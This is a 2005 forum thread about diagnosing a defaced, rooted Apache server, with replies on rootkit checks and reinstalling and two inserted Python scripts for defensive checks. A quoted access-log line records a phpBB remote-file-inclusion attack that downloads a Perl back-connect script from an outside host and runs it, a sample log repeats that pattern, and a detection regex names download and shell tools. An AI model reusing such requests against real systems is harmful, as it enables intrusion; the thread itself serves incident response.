SegmentationFault Ownz You id;uname -a ??? what is this?
Hi all, I have had a webserver up for about a year now and today I got up to something strange... my desktop has no icons on it and I can't find any on the system at all. All my files look like a document file, including my folders, and my web page has reverted back to the setup page where it says
( Test Page )
This page is used to test the proper operation of the Apache Web server after it has been installed. If you can read this page, it means that the Apache Web server installed at this site is working properly.
I can access my web if I put admin.php at the end of my web address, but if I try to go to some links on my web I get this...
SegmentationFault Ownz You
id;uname -a
uid=0(root) gid=0(root) groups=48(apache),501(airsoft)
Linux localhost.localdomain 2.4.20-31.9 #1 Tue Apr 13 17:38:16 EDT 2004 i686 athlon i386 GNU/Linux
EOF
Yes, that looks like a note from someone going by the name SegmentationFault.
id shows his user info (to show you he was root when he did this).
uname -a lists info about your system, but this was kind of dumb of him because now you know exactly when he broke in and you may be able to check the logs and track him down.
Re: SegmentationFault Ownz You id;uname -a ??? what is this?
Quote:
Originally posted by mrfreeze: Please don't tell me I was hacked...
Sorry, but it sounds very much like that's the case. You can download and run rkhunter or chkrootkit to be extra sure, but the defacement of your webpage looks similar to these: http://www.google.com/search?q=Segme...Fault+Ownz+You
You can also try looking through your logs, check the output of 'last' for abnormal logins, check /etc/passwd for abnormal entries, check for abnormal SUID/SGID files, and for odd files/dirs especially in /tmp. To be honest though it sounds very likely that you've been compromised, especially if you've been running old versions of PHP. So you'll need to do a full format and re-install from trusted media (not from a backup).
Moved: This thread is more suitable in our Linux-Security forum, and has been moved accordingly to help your thread/question get the exposure it deserves.
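Three of the checks listed above (extra UID 0 entries in /etc/passwd, SUID/SGID files, odd files in /tmp) as a small script. This is an added example, not part of the original posts; the function names and the sample passwd content are constructed for illustration.

```python
import os
import stat

# Constructed sample, not taken from the thread: one extra UID 0 account.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
sysadm:x:0:0::/tmp:/bin/sh
alice:x:501:501::/home/alice:/bin/bash
"""

def uid0_accounts(passwd_text):
    """Names of accounts other than root that carry UID 0."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and fields[2] == "0" and fields[0] != "root":
            hits.append(fields[0])
    return hits

def is_setid(mode):
    """True for a regular file with the SUID or SGID bit set."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))

def find_setid(root):
    """Yield SUID/SGID regular files under root; unreadable paths are skipped."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if is_setid(os.lstat(path).st_mode):
                    yield path
            except OSError:
                continue

def tmp_suspects(tmp_dir, suffixes=(".pl", ".sh", ".py", ".php")):
    """Regular files directly in tmp_dir that are executable or named like scripts."""
    hits = []
    for entry in os.scandir(tmp_dir):
        if entry.is_file(follow_symlinks=False):
            mode = entry.stat(follow_symlinks=False).st_mode
            if entry.name.endswith(suffixes) or mode & 0o111:
                hits.append(entry.name)
    return sorted(hits)

if __name__ == "__main__":
    with open("/etc/passwd") as fh:
        print("extra UID 0 accounts:", uid0_accounts(fh.read()))
    print("SUID/SGID under /usr:", sorted(find_setid("/usr")))
    print("suspect files in /tmp:", tmp_suspects("/tmp"))
```

The SUID/SGID list only means something when compared against a known-good list for the same distribution. On a host that may already be rooted, run it from trusted media against the mounted disk, since the installed tools and kernel can hide files.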
Would this be him here?
<SNIP>
/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.segfaultbr.hpgvip.com.br/tool25.gif?&cmd=cd%20/tmp/;wget%20www.neoit.com/cproject/dc.pl;perl%20dc.pl%20200.147.116.249%2022 HTTP/1.1" 200 8937 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
Probably. Looks like they used this vuln. You can check /tmp for the dc.pl script that's downloaded and executed by the last request, but I wouldn't be surprised if it had been removed already.
And how do I fix this... if you know how, it would make my life so much easier, thanks
You can avoid getting compromised in the first place by keeping your software updated. There have been a large number of PHP and PHP-related vulnerabilities recently, so you really need to be careful and make sure you've applied all security patches. However, you will still need to format and re-install the system.
Last edited by Capt_Caveman; 05-26-2005 at 12:15 AM.
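The access-log entry quoted above has two recognisable traits: a parameter whose value is a remote URL, and a parameter carrying shell commands. The scanner below flags both in Apache access-log lines; it is an added example, not part of the original posts, and the sample lines are constructed with documentation addresses and the placeholder host attacker.example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines (documentation IPs, placeholder host names).
SAMPLE_LOG = """192.0.2.10 - - [25/May/2005:03:10:01 -0400] "GET /index.php?name=Forums&file=viewtopic&t=12 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
198.51.100.7 - - [25/May/2005:03:12:45 -0400] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://attacker.example/tool.gif?&cmd=cd%20/tmp/;wget%20attacker.example/x.pl;perl%20x.pl HTTP/1.1" 200 8937 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.7 - - [25/May/2005:03:13:02 -0400] "GET /admin_styles.php?phpbb_root_path=http://attacker.example/tool.gif? HTTP/1.1" 404 291 "-" "Mozilla/4.0"
"""

# Request line and status code inside a common/combined log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# A parameter value that is itself a URL suggests remote file inclusion.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)
# Shell metacharacters or common download/interpreter commands in a value.
SHELL_RE = re.compile(r'[;|`]|\$\(|\b(?:wget|curl|perl|sh|bash)\b', re.I)

def classify(line):
    """Return a finding dict for a suspicious request, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target, status = m.group(1), int(m.group(2))
    path, _, query = target.partition("?")
    findings = []
    # Split on '&' only, so ';' stays inside the value being inspected.
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        if REMOTE_URL_RE.match(value):
            findings.append(("remote-include", key))
        elif SHELL_RE.search(value):
            findings.append(("shell-command", key))
    if not findings:
        return None
    return {"path": path, "status": status, "findings": findings}

def scan(lines):
    """Return (line_number, finding) pairs for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        result = classify(line)
        if result:
            hits.append((number, result))
    return hits

if __name__ == "__main__":
    for number, hit in scan(SAMPLE_LOG.splitlines()):
        print(number, hit["status"], hit["path"], hit["findings"])
```

A flagged request answered with status 200, as in the thread's log entry, deserves attention first; a 404 on the same pattern usually means a probe against a script that is not installed.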
omg I just updated my php to 7.6 on the 22nd and I get hacked on the 25th... I just tracked this guy to Brazil and he says
F--- America SegmentationFault Ownz You
Wth... he should take a look at his country's name.
omg I just updated my php to 7.6 on the 22nd and I get hacked on the 25th...
Do you have any other PHP-related BB software? Could you check the versions you had installed to be sure? FWIW, PHP is only at 5.0.4, so I'm assuming you mean PHP-Nuke.
I just tracked this guy to Brazil
I'd send a polite email to each of the ISPs involved describing what happened and include relevant log messages.